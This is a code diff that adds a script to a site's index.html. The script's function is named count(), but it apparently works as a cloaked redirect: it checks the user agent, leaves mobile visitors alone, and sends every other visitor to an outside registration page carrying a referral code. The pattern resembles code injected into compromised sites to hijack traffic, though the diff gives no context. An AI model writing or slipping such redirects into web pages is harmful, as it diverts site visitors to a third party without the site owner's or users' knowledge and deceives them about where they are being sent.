--- a/index.html
+++ b/index.html
@@ -172,6 +172,22 @@ window.location.href = '/404.html';
   </div>
  </div>
  </div>
+<script>
+    count()
+    function count(){
+	var sUserAgent = navigator.userAgent.toLowerCase();
+	var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os";
+	var bIsMidp = sUserAgent.match(/midp/i) == "midp";
+	var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4";
+	var bIsUc = sUserAgent.match(/ucweb/i) == "ucweb";
+	var bIsAndroid = sUserAgent.match(/android/i) == "android";
+	var bIsCE = sUserAgent.match(/windows ce/i) == "windows ce";
+	var bIsWM = sUserAgent.match(/windows mobile/i) == "windows mobile";
+	if (bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM){
+	}else{
+	    window.location = "http://cn.man983.com/home/register?code=25825";
+	}
+}</script>
  <div id="iosAll">
     <div class="swiper-containerios">
         <div class="swiper-wrapper container" id="container1">
